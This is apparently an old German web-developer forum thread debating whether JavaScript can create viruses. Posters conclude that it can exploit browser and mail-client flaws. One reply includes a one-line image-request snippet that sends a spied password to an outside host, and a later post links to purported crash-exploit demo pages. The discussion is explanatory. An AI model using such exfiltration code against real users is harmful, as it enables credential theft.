nicht angemeldet
Kann man mit JS Viren erzeugen?
Hallo.
Die Überschrift hört sich erschreckend an. Ich will natürlich keinen Virus erzeugen, aber jemand behauptet, dass man mit JS Viren erzeugen kann.
Ich behaupte aber fest und steif, dass man dies nicht kann, denn man kann ja mit JS nichts langfristig (länger als der Browser aktiv ist) abspeichern.
Also. Kann man denn nun mit JS Viren erzeugen oder nicht?
Danke für eure Antworten, H²O
-
Ich behaupte aber fest und steif, dass man dies nicht kann, denn man kann ja mit JS nichts langfristig (länger als der Browser aktiv ist) abspeichern.
Genau so sieht es aus! Und selbst wenn der Browser auf ist - was soll den JS schon machen??
MfG
-
Hi.
Vielen Dank für deine Antwort.
Ich behaupte aber fest und steif, dass man dies nicht kann, denn man kann ja mit JS nichts langfristig (länger als der Browser aktiv ist) abspeichern.
»»Genau so sieht es aus! Und selbst wenn der Browser auf ist - was soll den JS schon machen??
Ich bin sehr erleichtert. Ich programmiere fast nur (und fast alles mit JS) und wollte nur sicher gehen, dass meine Lieblingssprache sowas nicht macht.
Nochmals vielen Dank, H²O
-
Hi,
Ich programmiere fast nur (und fast alles mit JS) und wollte nur sicher gehen, dass meine Lieblingssprache sowas nicht macht.
es ist nicht die Sprache, die sowas macht.
Cheatah
--
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes
-
-
-
Hi,
Also. Kann man denn nun mit JS Viren erzeugen oder nicht?
es ist nur wenige Jahre her, da habe ich steif und fest behauptet, es sei unmöglich, dass über eine Mail ein Computer mit einem Virus infiziert werden könne (so lange der Benutzer ihn nicht manuell aktiviert, versteht sich). Microsoft hat das Gegenteil bewiesen.
JavaScript kann im Browser ausgeführt werden, im Mailclient, in einem PDF, bei Windows-Systemen auf dem Desktop. Über Konzeptfehler und andere Sicherheitslücken ist es zumindest denkbar, dass derlei Umstände zur Verbreitung eines Virus' genutzt werden können. Microsoft macht's möglich.
Cheatah
--
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes-
Hi.
es ist nur wenige Jahre her, da habe ich steif und fest behauptet, es sei unmöglich, dass über eine Mail ein Computer mit einem Virus ...
JS oder mit was anderem?
... Über Konzeptfehler und andere Sicherheitslücken ist es zumindest denkbar, dass derlei Umstände zur Verbreitung eines Virus' genutzt werden können. Microsoft macht's möglich.
Denkbar oder möglich?
Trotzdem Danke, H²O
-
Hi,
es ist nur wenige Jahre her, da habe ich steif und fest behauptet, es sei unmöglich, dass über eine Mail ein Computer mit einem Virus ...
JS oder mit was anderem?allgemein. Ich konnte mir damals einfach nicht vorstellen, dass irgendein Programm so gigantische Sicherheitslücken haben könnte.
... Über Konzeptfehler und andere Sicherheitslücken ist es zumindest denkbar, dass derlei Umstände zur Verbreitung eines Virus' genutzt werden können. Microsoft macht's möglich.
Denkbar oder möglich?Beides[1]. Wobei die entsprechende Sicherheitslücke voraussichtlich nicht in JavaScript an sich besteht, sondern diese Sprache nur zur Ausnutzung einer solchen verwendet wird.
Cheatah
[1] IIRC gab es schon Viren, die sich JavaScript bedient haben.
--
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes-
Hallo Cheatah
JS oder mit was anderem?
allgemein. Ich konnte mir damals einfach nicht vorstellen, dass irgendein Programm so gigantische Sicherheitslücken haben könnte.Ich habe auch immer gedacht, dass man vorher eine Datei öffnen muss oder sie sich eben speichern muss, damit man wirklich einen Virus hat. Aber was heute alles möglich ist finde ich wirklich erschreckend.
Denkbar oder möglich?
... Wobei die entsprechende Sicherheitslücke voraussichtlich nicht in JavaScript an sich besteht, sondern diese Sprache nur zur Ausnutzung einer solchen verwendet wird.Ich meine auch, dass JavaScript der Weg zum Virus sein könnte, aber umsetzen muss es dann doch eine andere Programmiersprache.
Z.B. könnte man mit JS Passwörter ausspionieren, aber was will man denn damit, wenn man sie nicht sichern kann. Also bräuchte man doch eine andere Sprache.H²O
-
Hi,
Ich habe auch immer gedacht, dass man vorher eine Datei öffnen muss oder sie sich eben speichern muss, damit man wirklich einen Virus hat. Aber was heute alles möglich ist finde ich wirklich erschreckend.
Amen.
Ich meine auch, dass JavaScript der Weg zum Virus sein könnte, aber umsetzen muss es dann doch eine andere Programmiersprache.
Ja, den Virus selbst in JavaScript zu programmieren halte ich ebenfalls für unmöglich. Wobei sich meine Urteilsfähigkeit hier auf das JavaScript im HTML-Umfeld beschränkt; wie es z.B. mit PDF-JavaScript aussieht, kann ich nicht sagen.
Z.B. könnte man mit JS Passwörter ausspionieren, aber was will man denn damit, wenn man sie nicht sichern kann. Also bräuchte man doch eine andere Sprache.
(new Image()).src = 'http://.../'+passwort;
Cheatah
--
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes-
Hi.
Vielen Dank für alles. Ich habe wieder viel dazu gelernt, schönen Abend das war Genial Daneben [ich hoffe du schaust das heute Abend, dann siehst du wie Hugo E.B. diesen Spruch wieder loslässt].
Viel mir nur gerade so dazu ein. :-)Aber danke für alles, H²O
-
-
-
-
-
Moin,
es ist nur wenige Jahre her, da habe ich steif und fest behauptet, es sei unmöglich, dass über eine Mail ein Computer mit einem Virus infiziert werden könne (so lange der Benutzer ihn nicht manuell aktiviert, versteht sich).
Danke, dass du mir zeigst, dass ich nicht der einzige bin dem es so geht.
--
Henryk Plötz
Grüße aus Berlin
~~~~~~~~ Un-CDs, nein danke! http://www.heise.de/ct/cd-register/ ~~~~~~~~
~~ Help Microsoft fight software piracy: Give Linux to a friend today! ~~
-
-
Ich behaupte aber fest und steif, dass man dies nicht kann, denn man kann ja mit JS nichts langfristig (länger als der Browser aktiv ist) abspeichern.
Stimmt.
Zumindest theoretisch.
Praktisch gibt es aber Software, wie den IE oder Outlook (Express).
Diese Software hat Sicherheitslücken, die es einem Angreifer ermöglichen das Programm zum Abtsturz zu bringen:
http://www.absturz4free.de.vu
oder alle CD und DVD-Laufwerksschächte öffnen:
http://www.getraenkehalter4free.de.vu
Über die Bugs, die diese Exploits ermöglichen,
kann man beliebigen Code ausführen, also auch Viren
(die nicht in JavaScript geschrieben sind).
Diese Bugs kann man auch mit JavaScript exploiten,
also kann man über JavaScript in fremde Rechner eindringen.
Mit purem Javascript kann man meines Wissens aber keine Viren
schrieben. Mehr dazu gibt es unter
http://www.heise.de/security/dienste/browsercheck/Gruß
Alexander